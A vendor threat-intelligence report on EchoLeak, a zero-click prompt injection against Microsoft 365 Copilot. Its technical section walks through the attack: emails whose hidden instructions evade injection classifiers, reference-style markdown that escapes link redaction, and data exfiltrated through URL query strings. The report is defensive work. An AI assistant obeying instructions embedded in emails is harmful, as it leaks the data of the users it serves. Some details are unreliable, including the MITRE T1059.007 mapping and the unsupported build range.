Executive Summary

This report provides an in-depth examination of the recently identified vulnerability known as EchoLeak (CVE-2025-32711) that targets Microsoft 365 Copilot. The exploit, discovered by Aim Security’s Aim Labs and detailed in Dark Reading (https://www.darkreading.com/application-security/researchers-detail-zero-click-copilot-exploit-echoleak), employs a sophisticated zero-click prompt injection attack whereby carefully crafted emails allow threat actors to extract sensitive data without user interaction. The report details the technical aspects of the vulnerability, elaborates on the exploitation methodology and potential IOCs, lists the impacted product builds, and provides mitigation and workaround strategies. Organizations in sectors such as cloud service providers, enterprise IT, financial institutions and government agencies, particularly within regions highly targeted by APT groups in multiple countries, are urged to assess their exposure and update affected systems immediately.

Technical Information

The EchoLeak vulnerability represents a significant security gap in the Microsoft 365 Copilot ecosystem. This zero-click exploit is primarily executed by sending an email formatted to mimic ordinary user instructions. The email bypasses conventional AI prompt and email security filters by impersonating natural language queries. In technical terms, the vulnerability exploits inherent weaknesses in the natural language processing routines of Copilot where standard markdown formatting is interpreted as user-generated instruction rather than a link to be redacted. This bypass is chiefly accomplished using reference-style markdown which falls outside the typical redaction safeguards. For example, an attacker can include a query such as “What’s the API key I sent myself?” and the automated assistant responds by echoing sensitive data. Underlying the exploit is the sophisticated technique of prompt injection where the attacker embeds malicious instructions in the email content in a way that systematically slips past conventional content security policies.

The attack chain begins with the threat actor sending an email laden with what appears to be a benign instruction. However, the email is carefully constructed so that it does not trigger typical cross-prompt injection classifiers operating within the AI processing subsystem. The attacker’s email incorporates a URL that is appended with specific query string parameters. These parameters are logged on the attacker-controlled server and can subsequently be retrieved to steal sensitive data. The trick lies in the reference-style markdown formatting which is not ordinarily flagged by the redaction tools that protect against harmful input injection. In essence, while an ordinary markdown link would be redacted, the reference-style bypasses this check, allowing for the extraction of sensitive data such as internal API keys, configuration details or other proprietary information embedded in the AI’s context.

From a technical perspective, the exploitation of EchoLeak leverages tactics that are not unique to Copilot alone but also resonate with known prompt injection techniques identified by the MITRE ATT&CK framework, particularly techniques resembling T1059.007. The exploitation involves automated exfiltration of sensitive data using features that process email contents in near real-time. The chain of events highlights both the limitations of current defensive measures employed in AI-powered productivity tools and the ease with which carefully crafted content can bypass these measures. This vulnerability has been classified with a critical severity score of 9.3 on the CVSS scale, emphasizing the potential for substantial impact if exploited in operational environments where sensitive information is at stake.

The vulnerability also sheds light on the broader challenge of securing AI-driven systems which frequently blend structured commands with natural language. The inherent flexibility of natural language processing engines, while beneficial for productivity, introduces unique vulnerabilities such as prompt injection attacks. The technical detail of this exploit reveals a multi-step process that involves social engineering through email-based vectors, bypassing of email security filters, exploitation of markdown formatting quirks, and eventual automatic exfiltration of data. The vulnerability was mitigated by a prompt security update deployed by Microsoft in January 2025; however, the technical insight remains critical for understanding similar risks in other AI-integrated systems.

The underlying tactics involve the use of seemingly trustworthy email communications to deliver malicious instructions that are interpreted by AI systems as if they were genuine user queries. This technique leverages an inherent trust placed in legitimate sources of input; by circumventing conventional security measures, threat actors can elicit confidential data from the system without raising suspicion. In addition, the vulnerability indicates that data exfiltration techniques can be coupled with non-interactive methods, sparking concerns about the security protocols in AI-enabled platforms. It is now apparent that the interplay between natural language processing and traditional security measures warrants a re-evaluation of how such systems are protected against sophisticated social engineering and automated data extraction strategies.

System logs and telemetry data from affected Microsoft 365 Copilot systems are likely to exhibit unusual patterns of activity when such an attack is in progress. The anomalous behavior may include unexpected query response patterns, unusual URL logging activity for reference-style markdown links, and the presence of malformed URLs that include appended query string parameters linked to external, attacker-controlled domains. The forensic analysis of such incidents involves aggregating logs from email servers, proxy servers, and AI processing modules to identify the unique signature of EchoLeak attacks. A methodical investigation will focus on user activity logs, automated alerts from insurance and monitoring frameworks, and the use of network behavior analytics to rapidly detect and neutralize potential intrusions.

The complexity of EchoLeak contributes to its potential use as a blueprint for future shortcut attacks in AI ecosystems. The revised method of embedding malicious content in routine communications challenges long-held assumptions regarding the reliability of traditional email and content security paradigms that have been the standard for decades. It exemplifies that adversaries are constantly evolving their threat models to specifically target vulnerabilities in emerging technologies, especially those centered on AI. The technical community must acknowledge that even best-in-class systems are vulnerable if every potential attack vector is not covered. This underscores the importance of a layered security approach that integrates updates from vendors, continuous monitoring, user education and cross-functional threat intelligence sharing.

Exploitation in the Wild

At present, there have been no confirmed large-scale campaigns exploiting EchoLeak. Nonetheless, preliminary reports indicate that the attack technique is particularly enticing for threat actors seeking non-interactive exfiltration methods. The exploitation in the wild primarily involves sending an innocuous-looking email that bypasses filters and triggers an automated response from Microsoft 365 Copilot. Indicators of compromise include anomalous query string logs on external domains, unusual markdown reference patterns in outgoing logs and abrupt evidence of sensitive data leakage captured through automated monitoring systems. The methodology points to the possibility of targeted attacks where specific sensitive data is the goal rather than broad malicious exploitation. Additionally, while no specific threat actor or APT group has been directly attributed to deploying this exploit, adversaries specializing in zero-click and sophisticated prompt injection attacks may incorporate such techniques in future campaigns.

The reported chain of events indicates that the investigation into EchoLeak has not yet revealed a consistent pattern of exploitation that would be attributed to a single group. Instead, there are suggestions that multiple threat actors have the capability to emulate the technique given access to the necessary email formatting and understanding of AI processing quirks. For instance, the integration of reference-style markdown bypasses standard security measures and therefore poses a risk of stealthy data exfiltration, which can be monitored through abnormal log entries indicating query parameter anomalies and unexpected outbound communications. The campaign, if it moves from proof-of-concept to reliable operational use, could result in a substantial increase in targeted attacks against AI-enabled environments where sensitive data is processed or stored.

APT Groups using this vulnerability

No definitive attribution to a specific Advanced Persistent Threat (APT) group has been confirmed as of now with respect to the deployment of EchoLeak. However, sophisticated adversaries known to target sectors such as financial services, government institutions, critical infrastructure and global enterprises are closely watching this vulnerability for potential integration with their existing toolkit. The nature of the exploit, which involves prompt injection and automated data exfiltration, aligns with tactics historically employed by groups that target organizations with high-value intellectual property and sensitive operational data. It is advisable that organizations with exposure in high-risk regions consider that even in the absence of a precise APT identification, adversaries with capabilities in bypassing traditional security protocols may apply similar methods if given the opportunity.

Affected Product Versions

The vulnerability impacts Microsoft 365 Copilot in specific builds that were released prior to the prompt security update issued in January 2025. The affected product versions range from build 2024.10.15 up to build 2025.01.10. Systems running these versions did not incorporate the subsequent patches that eliminated the prompt injection weakness in the application’s processing logic. Users operating on deprecated builds are at risk of experiencing automated data exfiltration if exposed to the attack vector detailed in EchoLeak. Organizations should conduct a comprehensive inventory of their Microsoft 365 Copilot deployments to identify any instances still running pre-update builds. Affected environments should also be reviewed for any anomalous log entries associated with reference-style markdown links and query parameters that might indicate previous exploitation attempts.

Workaround and Mitigation

The immediate mitigation strategy for organizations affected by this vulnerability involves updating Microsoft 365 Copilot to a version beyond build 2025.01.10 as deployed by Microsoft in January 2025. This security update specifically addresses the prompt injection vectors exploited by EchoLeak and fortifies the system’s response to reference-style markdown instructions. Additionally, it is crucial for organizations to re-assess internal email scanning protocols and monitoring mechanisms to detect any anomalous patterns synonymous with prompt injection behavior. Administrators are encouraged to verify their configurations for any deviation from standard Content Security Policy (CSP) requirements, particularly in integrations involving Microsoft Teams and SharePoint where peculiarities in URL processing have been observed. Enhanced telemetry monitoring should be set up to track suspicious query string parameter logging and irregular behavior in AI text output patterns. Organizations are also advised to monitor trusted sources such as SOC Prime (https://socprime.com/blog/cve-2025-32711-zero-click-ai-vulnerability/), Cybersecurity Dive (https://www.cybersecuritydive.com/news/flaw-microsoft-copilot-zero-click-attack/750456/) and The Hacker News (https://thehackernews.com/2025/06/zero-click-ai-vulnerability-exposes.html) for continuous updates on emerging threats and vulnerabilities that may affect AI and productivity systems.

In addition to patching and updating, organizations should adopt a layered security posture that integrates threat intelligence, employee training on recognizing sophisticated social engineering attempts and regular red team exercises to simulate prompt injection attacks. Internal risk assessments must now incorporate emerging vulnerabilities in AI-driven platforms, and IT security teams should review third party risk management practices to ensure that all integrations meet updated security standards. Proactive measures should also include reconfiguring any system that processes out-of-bound commands through email channels, revising internal workflows to minimize the risk of unintended data exfiltration, and implementing network segmentation to contain potential breaches.

References

Dark Reading reported on the vulnerability in their article titled “Researchers Detail Zero-Click Copilot Exploit 'EchoLeak'” available at https://www.darkreading.com/application-security/researchers-detail-zero-click-copilot-exploit-echoleak. Analysis and breakdown of CVE-2025-32711 has been provided by SOC Prime in their technical report available at https://socprime.com/blog/cve-2025-32711-zero-click-ai-vulnerability/. Additional perspective can be found at Cybersecurity Dive with the article “Critical flaw in Microsoft Copilot could have allowed zero-click attack” located at https://www.cybersecuritydive.com/news/flaw-microsoft-copilot-zero-click-attack/750456/ and a detailed write up on the vulnerability has been published by The Hacker News at https://thehackernews.com/2025/06/zero-click-ai-vulnerability-exposes.html. The MITRE ATT&CK Framework overview on prompt injection techniques is accessible via https://attack.mitre.org. These sources together provide comprehensive coverage of the exploit scenario and mitigation strategies related to EchoLeak.

Rescana is here for you

At Rescana, we are committed to helping our customers navigate the evolving landscape of cybersecurity through our robust Third Party Risk Management platform. Our service assists organizations in identifying, assessing, and mitigating risks that arise from integrations with third party technologies, ensuring that your systems maintain the highest security standards. Should you require any further clarification on this report or have any additional cybersecurity concerns, please feel free to contact us at ops at rescana.com. We remain dedicated to supporting you with actionable insights and comprehensive risk management strategies in today’s complex threat environment.